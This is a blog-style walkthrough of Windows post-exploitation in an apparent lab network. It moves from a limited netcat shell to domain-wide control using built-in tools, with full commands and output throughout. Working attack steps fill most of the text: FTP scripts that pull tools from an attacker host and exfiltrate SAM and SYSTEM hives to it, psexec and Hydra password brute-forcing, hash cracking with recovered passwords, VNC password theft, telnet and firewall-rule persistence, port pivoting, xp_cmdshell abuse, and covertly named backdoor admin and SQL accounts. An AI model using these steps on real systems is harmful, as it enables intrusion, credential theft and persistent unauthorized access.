Windows Post Exploitation

In this post I’m going to walk through a Post Exploitation scenario, starting with a netcat shell, with limited user privileges. The goal is to move up the network without using penetration testing products like Metasploit, Core Impact, CANVAS or others, using the least amount of tools by trying to leverage the target systems OS resources.

Reconnaissance3
If you want to win, you must know your environment.

Start by gathering System related information 

C:\>systeminfo
systeminfo

Host Name:                 XP-INTRANET
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          User
Registered Organization:  
Product ID:                76487-OEM-0060233-70102
Original Install Date:     3/1/2011, 6:18:31 PM
System Up Time:            1 Days, 22 Hours, 31 Minutes, 28 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 15 Model 2 Stepping 8 GenuineIntel ~2800 Mhz
BIOS Version:              PTLTD  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     127 MB
Available Physical Memory: 28 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\XP-INTRANET
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: KB936929 - Service Pack
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.1.137
                                 IP address(es)
                                 [01]: 10.0.1.138

From the systeminfo command we can extract detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards.

Next we’ll check the available services

Running Services

C:\>tasklist /svc
tasklist /svc

Image Name                   PID Services                                    
========================= ====== =============================================
System Idle Process            0 N/A                                        
System                         4 N/A                                        
smss.exe                     536 N/A                                        
csrss.exe                    592 N/A                                        
winlogon.exe                 616 N/A                                        
services.exe                 660 Eventlog, PlugPlay                          
lsass.exe                    672 PolicyAgent, ProtectedStorage, SamSs        
vmacthlp.exe                 836 VMware Physical Disk Helper Service        
logonui.exe                  848 N/A                                        
svchost.exe                  880 DcomLaunch, TermService                    
svchost.exe                  968 RpcSs                                      
svchost.exe                 1060 AudioSrv, Browser, CryptSvc, Dhcp, dmserver,
                                 ERSvc, EventSystem,                        
                                 FastUserSwitchingCompatibility, helpsvc,    
                                 lanmanserver, lanmanworkstation, Netman,    
                                 Nla, Schedule, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, srservice, Themes, TrkWks,
                                 W32Time, winmgmt, wscsvc, wuauserv, WZCSVC  
svchost.exe                 1192 Dnscache                                    
svchost.exe                 1212 LmHosts, RemoteRegistry, SSDPSRV, WebClient
spoolsv.exe                 1416 Spooler                                    
vmtoolsd.exe                1660 VMTools                                    
VMUpgradeHelper.exe         1880 VMUpgradeHelper                            
alg.exe                     1808 ALG                                        
imapi.exe                   1604 ImapiService                                
csrss.exe                   2692 N/A                                        
winlogon.exe                2720 N/A                                        
rdpclip.exe                 2916 N/A                                        
wscntfy.exe                 2920 N/A                                        
explorer.exe                3032 N/A                                        
VMwareTray.exe              3352 N/A                                        
logon.scr                   2164 N/A                                        
cmd.exe                     2268 N/A                                        
nc.exe                      1136 N/A                                        
cmd.exe                     4008 N/A                                        
tasklist.exe                2604 N/A                                        
wmiprvse.exe                3496 N/A

Installed Services 

C:\>sc query state= all
sc query state= all

SERVICE_NAME: Alerter
DISPLAY_NAME: Alerter
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077	(0x435)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: ALG
DISPLAY_NAME: Application Layer Gateway Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0	(0x0)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

...

SERVICE_NAME: WinVNC4
DISPLAY_NAME: VNC Server Version 4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0	(0x0)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

...

SERVICE_NAME: xmlprov
DISPLAY_NAME: Network Provisioning Service
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077	(0x435)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

From the information obtain we have a clear picture of the exploited machine, and some system recourses the we can leverage, like the VNC Server seen above.

User Related Information

Current environment settings

C:\>set

set

ALLUSERSPROFILE=C:\Documents and Settings\All Users

APPDATA=C:\Documents and Settings\John\Application Data

CLIENTNAME=iMac

CommonProgramFiles=C:\Program Files\Common Files

COMPUTERNAME=XP-INTRANET

ComSpec=C:\WINDOWS\system32\cmd.exe

FP_NO_HOST_CHECK=NO

HOMEDRIVE=C:

HOMEPATH=\Documents and Settings\John

LOGONSERVER=\\XP-INTRANET

NUMBER_OF_PROCESSORS=1

OS=Windows_NT

Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 15 Model 2 Stepping 8, GenuineIntel

PROCESSOR_LEVEL=15

PROCESSOR_REVISION=0208

ProgramFiles=C:\Program Files

PROMPT=$P$G

SESSIONNAME=RDP-Tcp#4

SystemDrive=C:

SystemRoot=C:\WINDOWS

TEMP=C:\DOCUME~1\John\LOCALS~1\Temp

TMP=C:\DOCUME~1\John\LOCALS~1\Temp

USERDOMAIN=XP-INTRANET

USERNAME=John

USERPROFILE=C:\Documents and Settings\John

windir=C:\WINDOWS

Filtering the results

Find Username

C:\>set | find "USERNAME"

set | find "USERNAME"

USERNAME=John

Find Domain

C:\>set | find "USERDOMAIN"

set | find "USERDOMAIN"

USERDOMAIN=XP-INTRANET

Find Current User Information 

C:\>net user John
net user John
User name                    John
Full Name                    John
Comment                    
User's comment              
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/11/2011 1:38 PM
Password expires             Never
Password changeable          9/11/2011 1:38 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                
User profile                
Home directory              
Last logon                   9/13/2011 8:15 PM

Logon hours allowed          All

Local Group Memberships      *Remote Desktop Users *Users              
Global Group memberships     *None                
The command completed successfully.

Current User Privileges

...
Local Group Memberships      *Remote Desktop Users *Users              
Global Group memberships     *None  

Find Users with Administrator Privileges in the current machine

C:\>net localgroup Administrators
net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Jack
The command completed successfully.

Note

Users accounts other than the Administrator tend to have weaker passwords, so take note of the Jack account.

Privilege Escalation



Upload some useful tools using FTP

First make a file containing FTP commands

C:\>cd C:\Docume~1\John
cd C:\Docume~1\John

C:\DOCUME~1\John>echo Bob>ftp.src
echo Bob>ftp.src

C:\DOCUME~1\John>echo bobisyouruncle>>ftp.src
echo bobisyouruncle>>ftp.src

C:\DOCUME~1\John>echo bin>>ftp.src
echo bin>>ftp.src

C:\DOCUME~1\John>echo get PsExec.exe>>ftp.src
echo get PsExec.exe>>ftp.src

C:\DOCUME~1\John>echo get nc.exe>>ftp.src
echo get nc.exe>>ftp.src

C:\DOCUME~1\John>echo get FPipe.exe>>ftp.src
echo get FPipe.exe>>ftp.src

C:\DOCUME~1\John>echo get PassList.txt>>ftp.src
echo get PassList.txt>>ftp.src

C:\DOCUME~1\John>echo bye>>ftp.src
echo bye>>ftp.src

C:\DOCUME~1\John>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CC58-320F

 Directory of C:\DOCUME~1\John

09/16/2011  11:44 AM    <DIR>          .
09/16/2011  11:44 AM    <DIR>          ..
09/15/2011  01:44 AM    <DIR>          Desktop
09/11/2011  05:35 PM    <DIR>          Favorites
09/16/2011  11:42 AM                69 ftp.src
09/14/2011  11:51 AM    <DIR>          My Documents
03/01/2011  07:10 PM    <DIR>          Start Menu
               1 File(s)             73 bytes
               6 Dir(s)   2,913,312,768 bytes free

Run the FTP client 

C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174
ftp -s:ftp.src 10.0.1.174
User (10.0.1.174:(none)):

bin
get PsExec.exe
get nc.exe
get FPipe.exe
get PassList.txt
bye

C:\DOCUME~1\John>del ftp.src
del ftp.src

Password Guessing with PsExec

Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt

C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************
FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************
123456
12345
123456789
password
Password
iloveyou
P4ssw0rd1
princess
rockyou
Password123
1234567
12345678
abc123
P4ssw0rd
Nicole
Simplepass
Daniel
MyPass1
babygirl
monkey
Jessica
Lovely
michael
Ashley
Secret1
***************** Secret1 *****************
654321
Qwerty

Password for Jack: Secret1

Grabbing the Sam and System files

Sam File

C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\"
psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\"

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

cmd.exe exited with error code 0.

System File

C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\system C:\Docume~1\John\"
psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\system C:\Docume~1\John\"

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

cmd.exe exited with error code 0.

Make file containing FTP commands 

C:\DOCUME~1\John>echo Bob>ftp.src
echo Bob>ftp.src

C:\DOCUME~1\John>echo toor>>ftp.src
echo toor>>ftp.src

C:\DOCUME~1\John>echo bin>>ftp.src
echo bin>>ftp.src

C:\DOCUME~1\John>echo put sam>>ftp.src
echo put sam>>ftp.src

C:\DOCUME~1\John>echo put system>>ftp.src
echo put system>>ftp.src

C:\DOCUME~1\John>echo bye>>ftp.src
echo bye>>ftp.src

Uploading the files to the attacker machine 

C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174
ftp -s:ftp.src 10.0.1.174
User (10.0.1.174:(none)):

bin
put sam
put system
bye

Password Cracking 


Extract Hashes from the sam and system file with samdump2

root@bt:~# samdump2 sam system >hashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
root@bt:~# cat hashes.txt
Administrator:500:2087ec72c3dcba83d5367c170aa9b994:b8813ba5b424db4b6dcac460d84c127b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a24902c1f8098ab6b4a2760e3a0920ab:5d6d47bbb13ca7fddc038b99a07c333d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b5968af5ca7feec3bc364f8bf7978c8b:::

Password cracking with John the Ripper using a wordlist

root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt
Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
Secret1          (Jack)
Simplepass       (John)
P4ssw0rd         (Administrator)
guesses: 3  time: 0:00:00:00 100.00% (ETA: Fri Sep 16 21:53:18 2011)  c/s: 5591K  trying: Skidoing - Zhongguing

Passwords found:
Jack – Secret1
John – Simplepass
Administrator – P4ssw0rd

Persistence

Start stopped Services to maintain access

Back to the VNC Server Version 4 found previously.

Check the service state 

C:\DOCUME~1\John>sc query WinVNC4
sc query WinVNC4

SERVICE_NAME: WinVNC4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0	(0x0)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Start the service 

C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc start WinVNC4
psexec -u Jack -p Secret1 sc start WinVNC4

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0.

Check the service state 

C:\DOCUME~1\John>sc query WinVNC4
sc query WinVNC4

SERVICE_NAME: WinVNC4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0	(0x0)
        SERVICE_EXIT_CODE  : 0	(0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Grab VNC Password 

C:\DOCUME~1\John>psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg
psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

reg exited with error code 0.

View encrypted VNC Password 

C:\DOCUME~1\John>type vnc.reg
type vnc.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]
"Password"=hex:79,9a,a1,cb,85,e9,79,db
"SecurityTypes"="VncAuth"
"ReverseSecurityTypes"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000

VNC hash 799aa1cb85e979db

Decrypt the VNC hash in the attacker machine with vncdec.exe

C:\>vncdec.exe 799aa1cb85e979db
----------------------------------
RealVNC Password Decrypter
by Jonas Piela, www.jonaspiela.de
----------------------------------

running in hash mode...
----------------------------------
decrypted password: VNCPass
----------------------------------

Testing the connection with vncviewer

root@bt:~# vncviewer 10.0.1.138
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "XP-INTRANET"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage

 

Enable telnet server on the target machine

Note: I advise against using telnet as a persistence method, because telnet transmits data in plain readable text. Use SSH instead, in these example the goal is to introduce the least amount of tools on the targets machines, so I’ll use telnet.

Set service to automatically start upon boot

C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc config tlntsvr start= auto
psexec -u Jack -p Secret1 sc config tlntsvr start= auto

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0.

Start the Telnet server

C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc start tlntsvr
psexec -u Jack -p Secret1 sc start tlntsvr

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0..

Add rule to firewall 

C:\DOCUME~1\John>psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174
psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

netsh exited with error code 0.

Telnet to target machine

root@bt:~# telnet 10.0.1.138
Trying 10.0.1.138...
Connected to 10.0.1.138.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: Jack
password:

*=====================================
Welcome to Microsoft Telnet Server.
*=====================================
C:\Documents and Settings\Jack>

More Recon & Mapping

Gather Network Information

C:\Documents and Settings\Jack>cd C:\
C:\>ipconfig /all
Windows IP Configuration

        Host Name . . . . . . . . . . . . : XP-INTRANET
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : lab2-intranet

Ethernet adapter Local Area Connection 1:

        Connection-specific DNS Suffix  . : lab2-intranet
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-0C-29-B3-5C-13
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 10.0.1.138
        Subnet Mask . . . . . . . . . . . : 255.255.255.248
        Default Gateway . . . . . . . . . : 10.0.1.137
        DHCP Server . . . . . . . . . . . : 10.0.1.137
        DNS Servers . . . . . . . . . . . : 10.0.1.137
        Lease Obtained. . . . . . . . . . : Saturday, September 17, 2011 5:23:04 PM
        Lease Expires . . . . . . . . . . : Saturday, September 17, 2011 7:23:04 PM

Gather DNS Information

C:\>ipconfig /displaydns

Windows IP Configuration

         1.0.0.127.in-addr.arpa
         ----------------------------------------
         Record Name . . . . . : 1.0.0.127.in-addr.arpa.
         Record Type . . . . . : 12
         Time To Live  . . . . : 553930
         Data Length . . . . . : 4
         Section . . . . . . . : Answer
         PTR Record  . . . . . : localhost


         174.1.0.10.in-addr.arpa
         ----------------------------------------
         Name does not exist.


         localhost
         ----------------------------------------
         Record Name . . . . . : localhost
         Record Type . . . . . : 1
         Time To Live  . . . . : 553930
         Data Length . . . . . : 4
         Section . . . . . . . : Answer
         A (Host) Record . . . : 127.0.0.1

Find Shared Computers and Resources

C:\>net view
Server Name            Remark

-------------------------------------------------------------------------------
\\SERVER-2003          Server 2003                                            
\\XP-INTRANET          Windows-XP                                            
The command completed successfully.

Finding more Information about the Server-2003 machine

C:\>nslookup SERVER-2003
*** pfsense.lab2-intranet can't find SERVER-2003: Non-existent domain
Server:  pfsense.lab2-intranet
Address:  10.0.1.137

No luck here, let’s try using arp

C:\>arp -a
arp -a

Interface: 10.0.1.138 --- 0x2
  Internet Address      Physical Address      Type
  10.0.1.137            00-0c-29-8d-ca-6f     dynamic  

Use the arp command with * to delete all hosts and initiate a connection to the Server-2003 machine

C:\>arp -d
C:\>net use \\SERVER-2003
net use \\SERVER-2003
Enter the user name for 'SERVER-2003': System error 1223 has occurred.

The operation was canceled by the user.

The password or user name is invalid for \\SERVER-2003.

Check the arp table again, and if the network isn’t to busy we should have the Server-2003 machine IP address 

C:\>arp -a

Interface: 10.0.1.138 --- 0x2
  Internet Address      Physical Address      Type
  10.0.1.137            00-0c-29-8d-ca-6f     dynamic  
  10.0.1.140            00-0c-29-c0-07-e4     dynamic

We got lucky the Server 2003 IP address is 10.0.1.140

Let’s Port Scan the Server 2003 machine

C:\>FOR /L %i in (1,1,6000) do @netsh.exe diag connect iphost 10.0.1.140 %i | find "[%i]"
    Server appears to be running on port(s) [21]
    Server appears to be running on port(s) [53]
    Server appears to be running on port(s) [80]
    Server appears to be running on port(s) [135]
    Server appears to be running on port(s) [139]
    Server appears to be running on port(s) [445]
    Server appears to be running on port(s) [1025]
    Server appears to be running on port(s) [1026]
    Server appears to be running on port(s) [1032]
    Server appears to be running on port(s) [1200]
    Server appears to be running on port(s) [1433]
    Server appears to be running on port(s) [3389]
    Server appears to be running on port(s) [5800]
    Server appears to be running on port(s) [5900]

Open ports found: 21, 53, 80, 135, 139, 445, 1025, 1026, 1032, 1200, 1433, 3389, 5800, 5900.

Let’s check port 1433

Pivoting

Port Redirection with FPipe

Add rule to firewall

C:\>netsh firewall add portopening protocol = TCP port = 5555 name = PortForward mode = enable scope = custom address = 10.0.1.174
Ok.

Redirect local port 5555 to the 1433 port on the Server 2003 machine

C:\DOCUME~1\John>FPipe.exe -L 5555 -r 1433 10.0.1.140
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com

Password Guessing with THC-Hydra

root@bt:~# hydra -s 5555 -V -l sa -P PassList.txt -t 1 -w 60 -f 10.0.1.138 mssql
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-18 05:04:16
[DATA] 1 tasks, 1 servers, 28 login tries (l:1/p:28), ~28 tries per task
[DATA] attacking service mssql on port 5555
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "sa" - child 0 - 1 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "123456" - child 0 - 2 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "12345" - child 0 - 3 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "123456789" - child 0 - 4 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "Password" - child 0 - 5 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "iloveyou" - child 0 - 6 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "P4ssw0rd1" - child 0 - 7 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "princess" - child 0 - 8 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "rockyou" - child 0 - 9 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "Password123" - child 0 - 10 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "1234567" - child 0 - 11 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "12345678" - child 0 - 12 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "password1" - child 0 - 13 of 28
[5555][mssql] host: 10.0.1.138   login: sa   password: password1
[STATUS] attack finished for 10.0.1.138 (valid pair found)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-18 05:04:19

login: sa password: password1

Stored Procedure Attack using tsql

Connecting to the SQL service

root@bt:~# tsql -H 10.0.1.138 -U sa -p 5555
locale is "en_US.UTF-8"
locale charset is "UTF-8"
Password:
1> exec xp_cmdshell 'whoami';
2> go
Msg 15281, Level 16, State 1, Server SERVER-2003\SQLEXPRESS, Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.

Using sp_configure to reenable the stored procedure

1> EXEC sp_configure 'show advanced options',1
2> go
Msg 15457, Level 0, State 1, Server SERVER-2003\SQLEXPRESS, Line 163
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE
2> go
1> EXEC sp_configure 'xp_cmdshell',1
2> go
Msg 15457, Level 0, State 1, Server SERVER-2003\SQLEXPRESS, Line 163
Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE
2> go
1> exec xp_cmdshell 'whoami';
2> go
output
nt authority\system
NULL
(2 rows affected)
(return status = 0)
1> xp_msver 'ProductName'
2> go
Index	Name	Internal_Value	Character_Value
1	ProductName	NULL	Microsoft SQL Server
(1 row affected)
(return status = 1)

Adding a Local Administrator

Username: IWAM_NETASPS Password: $ecretP4$$

1> xp_cmdshell 'net user IWAM_NETASPS $ecretP4$$ /add'
2> go
output
The command completed successfully.
NULL
NULL
(3 rows affected)
(return status = 0)
1> xp_cmdshell 'net localgroup administrators IWAM_NETASPS /add'
2> go
output
The command completed successfully.
NULL
NULL
(3 rows affected)
(return status = 0)

Persistence – Keeping sysadmin-Level access

Username: iKuppu Password: 123P4$$

1> sp_addlogin 'iKuppu','123P4$$'
2> go
(return status = 0)
1> sp_addsrvrolemember 'iKuppu','sysadmin'
2> go
(return status = 0)

Grab the SAM and System files stored in the Registry from Server 2003


Back to the XP machine


First, set up a SMB session

C:\DOCUME~1\John>net use \\SERVER-2003 $ecretP4$$ /u:IWAM_NETASPS
The command completed successfully.

Find a Shared Folder 

C:\DOCUME~1\John>net view \\SERVER-2003
Shared resources at \\SERVER-2003

Server 2003

Share name  Type  Used as  Comment

-------------------------------------------------------------------------------
FTP         Disk
Shares      Disk
The command completed successfully.

Mount the Share folder

C:\DOCUME~1\John>net use * \\SERVER-2003\Shares
Drive Z: is now connected to \\SERVER-2003\Shares.

The command completed successfully.

Now let’s use the PsExec command to connect to the Server 2003 machine and copy the files with the reg command

C:\DOCUME~1\John>psexec \\SERVER-2003 -u IWAM_NETASPS -p $ecretP4$$ cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>cd C:\

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 7083-1B0B

 Directory of C:\

09/11/2011  09:58 PM                 0 AUTOEXEC.BAT
09/11/2011  09:58 PM                 0 CONFIG.SYS
05/29/2011  10:52 PM    <DIR>          Documents and Settings
09/12/2011  12:08 AM    <DIR>          FPSE_search
06/01/2011  04:52 AM    <DIR>          FTP
09/11/2011  05:44 PM    <DIR>          Inetpub
05/29/2011  04:41 AM    <DIR>          Program Files
06/04/2011  04:34 AM    <DIR>          Shares
06/04/2011  04:56 AM    <DIR>          WINDOWS
09/11/2011  09:59 PM    <DIR>          wmpub
               3 File(s)         61,440 bytes
               8 Dir(s)   5,891,756,032 bytes free

C:\>cd Shares

C:\Shares>reg save HKLM\SAM SAM
The operation completed successfully.

C:\Shares>reg save HKLM\System System
The operation completed successfully.

C:\Shares>exit
cmd.exe exited on SERVER-2003 with error code 0.
The last step is to upload the files to the attacker machine
 
C:\DOCUME~1\John>ftp 10.0.1.174
Connected to 10.0.1.174.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 12:01. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (10.0.1.174:(none)): Bob
331 User Bob OK. Password required
Password:
230-User Bob has group access to:  1001
230 OK. Current directory is /
ftp> bin
200 TYPE is now 8-bit binary
ftp> put Z:\SAM
200 PORT command successful
150 Connecting to port 5001
226-File successfully transferred
226 0.089 seconds (measured here), 451.25 Kbytes per second
ftp: 40960 bytes sent in 0.01Seconds 2730.67Kbytes/sec.
ftp> put Z:\System
200 PORT command successful
150 Connecting to port 5002
226-File successfully transferred
226 3.300 seconds (measured here), 0.69 Mbytes per second
ftp: 2404352 bytes sent in 3.20Seconds 750.42Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 2385 and downloaded 0 kbytes.
221 Logout.

New target, so let’s go back to Reconnaissance

System Information Gathering

OS Information

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion
Name                                                                                    ServicePackMajorVersion
Microsoft Windows Server 2003 Standard Edition|C:\WINDOWS|\Device\Harddisk0\Partition1  2

Installed Software

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version
Name                                                    Version
Microsoft SQL Server VSS Writer                         9.00.1399.06
Microsoft SQL Server Management Studio Express          9.00.2047.00
Microsoft SQL Server 2005 Express Edition (SQLEXPRESS)  9.00.1399.06
MSXML 6.0 Parser                                        6.00.3883.8
Microsoft .NET Framework 2.0                            2.0.50727
Microsoft SQL Server Setup Support Files (English)      9.00.1399.06
Microsoft SQL Server Native Client                      9.00.1399.06

Running Process

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief
HandleCount  Name                 Priority  ProcessId  ThreadCount  WorkingSetSize
0            System Idle Process  0         0          1            16384
1569         System               8         4          55           217088
31           smss.exe             11        240        2            458752
481          csrss.exe            13        300        10           3317760
526          winlogon.exe         13        332        24           10756096
329          services.exe         9         384        17           3985408
571          lsass.exe            9         396        30           9371648
161          svchost.exe          8         588        7            5005312
285          svchost.exe          8         660        10           3923968
137          svchost.exe          8         728        7            4132864
171          svchost.exe          8         780        13           5689344
1025         svchost.exe          8         796        45           17334272
131          spoolsv.exe          8         988        13           4653056
